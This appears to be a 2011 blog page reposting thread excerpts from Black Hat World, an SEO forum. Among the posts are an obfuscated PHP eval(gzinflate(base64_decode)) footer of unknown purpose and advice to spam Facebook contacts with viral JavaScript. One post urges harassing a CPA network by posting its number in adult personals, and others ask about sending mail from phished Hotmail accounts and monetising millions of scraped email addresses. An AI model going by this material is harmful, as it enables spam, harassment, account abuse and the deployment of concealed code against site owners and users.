Saturday, May 14, 2011

Black Hat Forum Black Hat SEO

Posted by IMers at 9:29 PM ,

Black Hat Forum Black Hat SEO


What are the VideoBB or Videozer view limits ?

Posted: 14 May 2011 08:49 PM PDT

Can't find that info, so anyone knows what are the limits for non-premium users for these two sites.

Want to add videos to my site but don't want to make my members angry. What is the length of video they can watch without limit and how many videos they can watch in some time period ?

Clad or CLBOT?

Posted: 14 May 2011 07:56 PM PDT

??? Best for craigslist???

[How to] Install Multisite For WordPress

Posted: 14 May 2011 07:43 PM PDT

Welcome Bhw I seen a Few Threads and post about how to Get Multisite enabled on your Server.
Now this setup is for multisite with subdomains meaning url.yourwebsite.com

I used Hostgator baby Package.


Step 1: Install Wordpress on your Site.
Step 2: While in your Cpanel We need to add a wildcard dns to your Site. Don't worry Its Easy! Go to sub Domains and Create a SubDomain with * (Exp= *.yourwebsite.com) this will Create the wildcard.
Step 3: Go to your wp-admin panel then plugins once in plugin Click add new Search for the Plugin "Multisite Enabler" Once installed Activate it.
Step 4: Go to Tools in your wp-admin and go down to network. Add your info hit install i belive.
Step 3:You will need to login again and now it should Say you need to do a bunch of stuff all you have to do is create the blogs.dir in wp-content/blogs.dir and make sure its writeable 755.
Step 5: Create a Test Sub domain and see if it works.

Im sure i missed some steps If you like to add what i missed please Post to help Everyone but this is the overall plan the plugin adds all the stuff you need to your .htaccess file and your wp-config

This is what worked for me, Thanks bhw

Keyword Research [FREE]

Posted: 14 May 2011 07:29 PM PDT

I am giving away 10 Keyword research packages for members on BHW.

Each one will come with Exact Match Domains.

To complete this i will need you to fill in the following:

Master Niche (I will generate keywords from this) -

BHW Username -

Any other requests -

Then you will need to email the info to: dancontentwriter(at)gmail(dot)com

I will then do keyword research for you and deliver the report to you email address.

Thanks

300% CTR from India...What to do.

Posted: 14 May 2011 06:49 PM PDT

I have a blog I run and about a week ago I started getting 100% + CTR for the day...My blog is very small so this was strange. So today I find out that all of this excess traffic is coming from India. Is there anyway I can block my ads from showing in India? Thanks

Attached Images
File Type: jpg india.jpg (16.6 KB)

Facebook hacker again help me and i will pay you

Posted: 14 May 2011 06:11 PM PDT

close this thread please

Website on Google - How long to Update?

Posted: 14 May 2011 06:10 PM PDT

I was wondering how can i speed up google updating my website info. I recently updated the websites title, and this is crucial to bringing in my income, but its already been a week and the spiders havent crawled it to update it, is there anything I can do?

How do I use random words to rotate per ad to make them different on CLAD ? Please Help..

Posted: 14 May 2011 06:09 PM PDT

Okay so I am tring to use the demo and do a test of about 10 postings.all multi cities and i need to make the title rotate and some parts of the body ....I am posting in the jobs sections. Now I can't figure out how to make this happen wheather I use it in the tokens or just enter in the html code for it in the original ad body text. I am kinda new to all this so please be gentle. and yes I have an ip solution for all this I am just stuck on this one thing. i

Scrapebox or

Posted: 14 May 2011 06:03 PM PDT

Hi,

I earned money by writing articles and I have now enough money to spend on scrapebox.

I have two choices.

Either I buy scrapebox or create a WSO:confused::confused: (Because I have awesome Ideas for it)

Some say go for SB, but I am confused :rolleyes::rolleyes:

is a great eyword domain that important?

Posted: 14 May 2011 05:54 PM PDT

edit: topic should be "is a great keyword domain that important" -- sorry about that :P

Im thinking about starting a blog, this will be my first step into making money with SEO. I was thinking of domain names for my blog and im wondering if exact domain keywords are really important.. example, If i want to make a blog about digitalcameras, as far as getting to the top of google for specific search terms about digital cameras, do i NEED to have digitalcameras in my domain name? Or if i'm making a site about skateboarding, and i want users who are searching for skateboarding information to find me, do i NEED to have skateboarding in my domain name?

I'm new to this so be gentle with the flames lol. I've been doing internet marketing for awhile now(mostly mailing) But i want to break through into the seo/blogging scene.. Just looking for some tips before i begin.

What To Do With 2.2M emails?

Posted: 14 May 2011 05:46 PM PDT

Hey,
I don't know anything about MM. What can I do with about 2.2M email addresses to earn money?

Any help is much appreciated - Magicaldung

BookMarking Demon is Expensive Do I have Enough SEO to Justify Buying It ?

Posted: 14 May 2011 05:40 PM PDT

I Know you can have work done here and on Fiver , LOL

BMD is $147

I have 2 will be money sites
7 micro nich site
and probably 50 web 2.0 sites
with eventually thousands of articles,

is this reason enough to get BMD,


Is the major reason to buy it is to make sure my sites get indexed and stay indexed over the long run,

is this a major use and reason to get it ?

Thanks

Can anyone decrypt this Footer for me?

Posted: 14 May 2011 05:33 PM PDT

Please, would appreciate it


Quote:

<?php
eval(gzinflate(base64_decode('DdVF0oRaogTg5fS9wQCX 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')));

?>

We still can spam facebook

Posted: 14 May 2011 05:31 PM PDT

So here is my story, I'm writing this because i see that too many peoples just gived up facebook marketing saying ( facebook is dead ... )
First:Facebook will never die ;) facebook change so quickly so every change will have some positive points and negative points too
Now I will make a little plan for newbies.

First:All you have to do is getting US friends, that's the key of all your sucess.
the more you got friends,the more money you will make.(I know that facebook is strict about adding friends but we have minds right ? :D )

Second:If you find anything like a method or a loophole on facebook then NEVER share it ( that was my big mistake ) Use it for your own purposes and never share it with anyone (even your best friend,brother,father ... )

Final:Javascript is still working.look for one on pastebin or on facebook ( this things are spreading viral now ! )

AIO:Make some accounts with US friends,Spam them using the JS code ;)
I assure that you will make HUGE money using this.

Cheers

Ayteck

PostLoop Alternatives?

Posted: 14 May 2011 05:30 PM PDT

As the the title says, anyone know of other forum posting networks that can help me get my forums off the ground?

Monetizing a Successful Site

Posted: 14 May 2011 05:18 PM PDT

I'm wondering the best way to make money if I already have a successful site? It's an adult(gay) image board, so standard SEO techniques don't really work, but the userbase is already established and I get many returning visitors.

The dynamic nature of the site makes it hard to get high in any search engine. I get around 5500 visitors a day and 40,000 uniques per month. What would pay more, affiliates or just regular ads? Are there other options?

youtube advertiser

Posted: 14 May 2011 05:12 PM PDT

Could someone tell me are there any discounts for this program

BrandChirp for Twitter

Posted: 14 May 2011 04:47 PM PDT

Sup BHW,

I just signed up for Brandchirp about a month ago. Got 4 twitter accounts on it. Got about 2k followers on all of them so far and at least half of the people I've gotten to follow me are actual people rather than businesses. Just wanted to find out if any of you guys use it and what are your experiences with it?

Cheers!

Keyword Research

Posted: 14 May 2011 04:38 PM PDT

I've been using Google KW tool to do most of my research but got another question. I just tried out http://www.secockpit.com/ which fetches information from DMOZ but the numbers with Google KW tool and this are different.

Which one should I stick with and what are the best numbers to look for?

[WTB] PVA Facebook Accounts

Posted: 14 May 2011 04:36 PM PDT

I need facebook PVA's I had 2 x 2.5k accounts and they got disabled :(

I have $2.50 in my paypal and need 1 or 2 PVA's

Please post here or PM me :)

[1.000th post ;) ] Betting the obvious method

Posted: 14 May 2011 04:29 PM PDT

Hi BHW community!

It has been long year, but I got here... 1.000th post :)

This method could be a bit controversial, but it is just monetizing obvious... I think there is hundreds worst morally methods on this forum than this ;)

So as you may know we had some crazy time lately with all the bad stuff going on on the world (LOL, as always to be honest).
OFC some of the big guns are monetizing ALL that is happening around the world with Facebook or Twitter.
But I want to focus on people doing so with exact match domains and SEO.
Question is - how the hell get #1 in rankings within few hours when topic gets hot? Well... Basically you cant (I wont discuss methods on how to do this).
Lets use the niche, that is bringing hundreds of thousands dollars every month to people that know how to play this game.


Starting from the beginning:



We need a topic.
Betting on obvious is like gambling. You need to know your odds.

Here are listed topics, that have 50% chance that they will happen within next 9-10 months:

Prince William Daughter
Prince William Son
Miley Cyrus Boyfriend
China Inflation
Afghanistan Bombing
Iraq Bombing
Us withdrawal from iraq
Us withdrawal from afghanistan
Caribbean Tsunami

Now when we have a topic, that is sure fire thing that will happen soon, we need to check for EMDs:



Holy Crap! So many EMDs available...Whats next? Simple - select few of them. Build an autoblogs there (its simple and cheap) and build few automated backlinks to them (you can find many services offering automated, high quality backlinks for small fee, find it in Service Section on BHW).

As you can imagine, there is almost no hassle with ranking keyword with absolutely no competition. It takes just few days, especially with EMDs...

So now you have 10-20 domains.
What next?


Waiting for it:


Its hard, but doable.
Just wait for it. It can take weeks, or months, but it will happen. Especially if you pick more than one domain.


Monetizing:


Anything non-death related = Adsense
Anything death related = Amazon and CPA (greatest hits CDs, greatest movies DVDs, some merchandise)


The "D" day:


It happened! Yay! What would you say about 50-500K highly targeted traffic hitting your site for 1-2 weeks? What would you say about people that convert at 5-10% ? Make as much money as you can! You cant have any issues. 10 minutes of server downtime = $$ lost. Right EMD with right topic can bring you $2-10K easily.


Some tips, so you wont miss this:


-Buy good hosting. Don't be cheap. Handling 10-15K traffic at the time can be a challenge for any server... If Google will see you are offline (they will check every few minutes) they will drop you to nowhere for few days/weeks and put newspapers on first page.
-On D-day remember to update your blog content (do not change anything besides adding articles regarding what happened)
-Don't sell your domain! When the time is right you will just loose time when looking for buyer. Monetize it, and prepare for another D-day if niche allows you
-Don't gave up. To make money with this money some people are betting 3-4 years ahead!
-Listen to gossip - some famous person is old and sick? Bet NameSurnameDead.com Famous sport guy getting old? Bet on NameSurnameRetirement.com Do you know who will take part of next presidential run? Bet on NameSurnamePresidency.com or SurnamePresidency.com Go above others and bet on something that have to happen soon. Bet on Oil Leak, Flu Virus, or even long term: Car Crash +City+ , Bermuda Triangle or Gulf Stream 2012... Possibilities are limitless...


Finding a topic:


You can find sure thing topics while reading some newspapers. You know that some things are happening on the world all the time. They are like recurring payment for you ;) Good topic is also in astrological niche... You know huge meteorite will just miss earth on October? Thats 3-4 months of heavy traffic hitting your site constantly!


Moral issue:


There is always moral issue while betting on disasters. But think like that: You are not scamming anybody, you are not trying to push shit, nobody gets hurt... Well, its you or newspapers who will make money from this news, so decide by yourself. Somebody WILL make money out of this anyways.

As you see this is international method. Use it in any country really.

Gimme some questions people


Thanks for taking your time to read this,

Bart


ubot password reset

Posted: 14 May 2011 04:27 PM PDT

Ok, I've googled for it, checked the site, contacted support (still waiting)...

I can't remember my password can somebody link me to the reset page. I found it once before but, can't seem to find it again.

+ rep for the person who links me first! :)

Genuine Flirt/Dating Website?

Posted: 14 May 2011 04:24 PM PDT

Does anyone know any real flirt/dating membership website niche?
Something like passion, adultfinder, blackbook...

But i'm looking for genuine and real ones and not a fake profile.
Because most of the site i saw are fake profile and images.

If any of you know or seen or a member of any of this site, feel free to share with me.

Thanks guys

Ads not contextual, I need Your Help

Posted: 14 May 2011 04:23 PM PDT

Hi Guys,

On my domain I have one generic (not niche) Wordpress blog. I have another blog (niche blog) on my subdomain: keywords.mydomain.com

I have a problem: In my generic blog I have adsense ads not contextual. All the ads are contextual for the keyword that I use on my subdomain.

I need your suggestions:

What I can do?

Is https://xsserver.eu/ DOWN Forever ?

Posted: 14 May 2011 04:22 PM PDT

Hello everybody,

I have tons of website on an Xsserver and the website is down.

Is that the first time ?

Anybody know more informations

Sorry for my very bad english

Best Regards

Quick backlink question

Posted: 14 May 2011 04:21 PM PDT

I have created a new site. It has no backlinks yet (I have started link building but non are indexed yet). One of my pages im targeting a long tail KW and I have been indexed in google at number 124

The top 5 spots are sites with pr 2-4 with little to no backlinks for that page but they have 10000+ backlinks to there domain (homepage & other pages)

How hard do you think it would be to get my site in the top 2?

dra$tic is a SCAMMER!!!

Posted: 14 May 2011 04:11 PM PDT

I posted a thread in the freelance section and the member dra$tic was one to reply to me in private message. He showed me some of the work he "supposedly" did and it looked legit and he also had positive itrader reviews so I trusted that he would do the work for me. He said I had to pay half upfront and half later, once I paid him half, he didn't log back on for a week and refused to answer my pms or the emails I sent.

Beware of this guy and I really hope the moderators consider banning him.

How much for urls with high pr

Posted: 14 May 2011 03:54 PM PDT

hey i was wondering whats the going rate for high pr lists like how much for a pr 7 list etc.

Big problem with SEO PRESSOR plugin

Posted: 14 May 2011 03:39 PM PDT

Hello, I've started using seo pressor plugin on WordPress, but when I click update it says :

"Warning: Cannot modify header information - headers already sent by ..."

Please help me. Or

Someone can send me a working plugin :).

Thanks

This is how to get even with your cpa who deciedes to keep your money!

Posted: 14 May 2011 03:26 PM PDT

put their info in the adult section and have a bunch of guys call em 24/7
they wont like that very much flodding their voice mails, calling them all day better yet put it in the gay section
and say im looking to hook up now and put their number on so everyone will call them and ruin their business!

xy7
prominent leads
copeac

are some of the biggest scammers around

Use proxies and hide email headers?

Posted: 14 May 2011 03:17 PM PDT

I was wondering what is a good way to use a proxy or hide my ip and info for sending and receiving messages through my gmail account? I am not doing anything crazy or spamming, but I will like to remain anonymous when sending some messages out to different people.

I use FF, and I would like something that is free and effective, any suggestions guys?

Hello BHW

Posted: 14 May 2011 03:15 PM PDT

I joined here so I can learn more about Black Hat and SEO. Hope to learn some more and meet more friends

Looking To Buy Private UK Proxies

Posted: 14 May 2011 03:14 PM PDT

Hi, I need 10 private UK proxies, anyone know where I can go or who on here is providing these?

Content Locker Pro (CLP) vs Lead Bolt

Posted: 14 May 2011 03:12 PM PDT

Okay, well I have website that currently gets 10-20 conversions/day with lead bolt content lockers script enabled on only one of my pages. I was wondering if it would be a better idea to purchase CLP (97$)? Would it make more conversions and would my earnings be greater?

The page averages 600-700 hits per day. Going to try and increase it, what do you guys think?

This is my first time implementing a content locker and am pleased to see "some" results with Lead Bolt. I've heard great things from CLP and I'm not sure if I should convert (I hate change).

Your opinions please..

-Ken

After 10 years watching smallville

Posted: 14 May 2011 03:05 PM PDT



Smallville end this season
when it got a somewhat surprising renewal.
Tom Welling let the news slip in an interview with deadline com sister site HollywoodLife com yesterday.
welling may have been too excited about getting his first series pickup as a producer yesterday when the cw ordered his cheerleading drama Hellcats.

Doubles the investment.

Posted: 14 May 2011 03:05 PM PDT

Basicly, what i need is someone to make a small investiment related to a sell of site in flippa.
I will return 2x your investiment (example, if you invest $80, i will return $160 to you guarantee)
More info PM ME.
Only honest people please!
Thanks!

Where is google keyword tools estimated CPC gone?

Posted: 14 May 2011 02:59 PM PDT

I am not sure wether blogging is the right section to ask this, but as keyword research is the beginning of most blogs, I thought I could put this here.

I am from Germany and for some days now, google keyword tool does no longer give me the option to show the estimated CPC for keywords so I wanted to know if it is a change made by google and affecting everyone or if it is in some way related to me and thus can be fixed.

SENukeX gurus

Posted: 14 May 2011 02:45 PM PDT

I haven't done any seo in like 13 years so I'm out out of the game. I got senukex and was learning it yesterday. I think I found a really good niche sentence.

Maybe I overlooked something but senuke said the 5 word sentence would be extremely easy.
The key words gets searched for in google adwords ~75,000 global searches
And says high competition. And has tons of websites listed.

When I check competition for the allintitle:keyword it lists it at
Domination Difficulty: Extremely easy! with 2 pages of results.

intitle:"keyword" inanchor:"keyword" lists 2 results in google for niche sentence.

Did I over look something? This seems to good to be true. Should it be pretty easy to get a high ranking for the sentence. Hardly any sites use allintitle. But a shitload of sites are listed when searching for the sentence.

None of the websites that have the allintitle:keyword rank in top 100 of google. But I didn't check if they have back links. Those sites didn't look like that great of sites.

Happy Birthday Andreyg13

Posted: 14 May 2011 02:44 PM PDT

Happy Birthday my very good friend Andrei!! Have a great one, and enjoy it!




Enjoy the cake!

[CLEAR] G showing me what it thinks I want to?

Posted: 14 May 2011 02:43 PM PDT

So you know that thing where after a while Google shows you what it think you want to see for results based on what you have clicked on before?

Is there any way to clear that out? I wanna see what the real results are not what I have been clicking on.

Like right now.. Even after logging out of my Google accoutn and clearing my cache in FF google shows my site at number three for my keyword.

All of the usual SERP checkers show me at number 8. it's annoying.

Is there a way to clear it?

A few Qs about Adsense.

Posted: 14 May 2011 02:31 PM PDT

1. Does adding Adsense on youre website, help in rankings ?

Logically youre earning G revenue, hence they should appreciate it. Or just a myth ?

2. Adding Adsense on youre site, might put you in the limelight, where youre Rankings will actually drop OR site goes into sandbox ?

3. Add adsense on frontpage OR add it into inside page links ?


Point of all, if you dont care about Adsense, and just want youre site to stay on TOP. Should you add it OR better off without it ? Inorder to avoid ANY risk ...

Got a lot of blogs to manage? Check out this new [free] wp manager beta

Posted: 14 May 2011 02:01 PM PDT

wp manage.com

i just found it today and i couldnt believe it was free. its in beta and lets you control all your blogs from one place. 10x better features than any other mass editor.

im not affiliated.

enjoy

adsense stuck from last 6 hrs :SSS

Posted: 14 May 2011 01:56 PM PDT

r u experiencing this ? i m in asia :( is that dangerous ? i m fairly new to adsense and never experienced this before ...

Where to begin

Posted: 14 May 2011 01:42 PM PDT

Heya guys, I'm sorry this sounds unreal, but could someone tell me where the best place to look is for information on starting blackhat seo, I see different topics regarding Xrumer etc, however I dont know what this is or what its primarily used for and wondered if someone had a spare 5minutes if they could point me to some useful topics, as im not sure specifically what to search for. many thanks

scrapeboard problem

Posted: 14 May 2011 01:38 PM PDT

For advanced mode, I have 34 emails in my inbox...but when i click fetch activation emails it does nothing. anyone know what to do?

(one click not working either)

Wordpress Tactics

Posted: 14 May 2011 01:24 PM PDT

My $4 a day thread got deleted or the forum is bugged or something. But I want to know how to make the best income with word press. I want to try to post blogs myself without the auto blogging stuff. If you have any Word Press suggestions please help me.

[GET] Mass Unlike pages for Facebook (usefull for twiends)

Posted: 14 May 2011 01:17 PM PDT

I saw someone asking for something like this in the twiends bot thread, so I decided to give it a try. Its one of my first Imacros, so its far from perfect.

This is for Imacros for FireFox.

If your list of pages loads faster than mine, you can change the
Code:

WAIT SECONDS=15
to a lower number.

if it skips one of the pages you can try to add another line of
Code:

TAG POS=1 TYPE=SPAN ATTR=BINDPOINT:text&&CLASS:uiButtonText&&TXT:Remove<SP>Page
WAIT SECONDS=1

or change
Code:

WAIT SECONDS=1
to like 2 seconds or something

Here is the code:
Code:

VERSION BUILD=7210419 RECORDER=FX
SET !ERRORIGNORE YES
TAB T=1
URL GOTO=http://www.facebook.com/editprofile.php?sk=activities
TAG POS=1 TYPE=A ATTR=TXT:Show<SP>Other<SP>Pages
WAIT SECONDS=15
TAG POS=1 TYPE=SPAN ATTR=BINDPOINT:text&&CLASS:uiButtonText&&TXT:Remove<SP>Page
WAIT SECONDS=1
TAG POS=1 TYPE=SPAN ATTR=BINDPOINT:text&&CLASS:uiButtonText&&TXT:Remove<SP>Page
WAIT SECONDS=1
TAG POS=1 TYPE=SPAN ATTR=BINDPOINT:text&&CLASS:uiButtonText&&TXT:Remove<SP>Page
WAIT SECONDS=1
TAG POS=1 TYPE=SPAN ATTR=BINDPOINT:text&&CLASS:uiButtonText&&TXT:Remove<SP>Page
WAIT SECONDS=1
TAG POS=2 TYPE=SPAN ATTR=BINDPOINT:text&&CLASS:uiButtonText&&TXT:Remove<SP>Page
WAIT SECONDS=1
TAG POS=2 TYPE=SPAN ATTR=BINDPOINT:text&&CLASS:uiButtonText&&TXT:Remove<SP>Page
WAIT SECONDS=1
TAG POS=2 TYPE=SPAN ATTR=BINDPOINT:text&&CLASS:uiButtonText&&TXT:Remove<SP>Page
WAIT SECONDS=1
TAG POS=2 TYPE=SPAN ATTR=BINDPOINT:text&&CLASS:uiButtonText&&TXT:Remove<SP>Page
WAIT SECONDS=1
TAG POS=2 TYPE=SPAN ATTR=BINDPOINT:text&&CLASS:uiButtonText&&TXT:Remove<SP>Page
WAIT SECONDS=1
TAG POS=1 TYPE=INPUT:BUTTON ATTR=NAME:close&&VALUE:Close
WAIT SECONDS=1

Someone can probably make this 100 times better, but I don't got the knowledge to do so, and I find it much easier to just let the computer running with this script instead of spending hours unliking pages

Traffic travis :O has it stopped working?!

Posted: 14 May 2011 01:13 PM PDT

Since yesterday my traffic travis seo analysis (the one where it shows top 10 stats) has stopped working. I'm wondering if everybody has got this issue?
There are just no results displayed...

Hotmail sending method?

Posted: 14 May 2011 01:06 PM PDT

Hey whats up

I was into e-mail marketing some years ago but left the scene because of some private reasons. Trying to get in again. Some months ago I saw a software live in action using real hotmail accs (phished or something) to send messages to the own lists or to ALL contacts within the account. I got an interesting offer of someone, offering me hotmail accs. Do you know which software can do something like that or must it be something self coded?

Thank you

FB 1.5 million emails ...why I can't see user trafficsource thread about Facebook emails?

Posted: 14 May 2011 01:03 PM PDT

Anyone knows?

Back Top

0 comments:

Post a Comment

Comment Author url are dofollow but comment are moderated by me , you know the drill.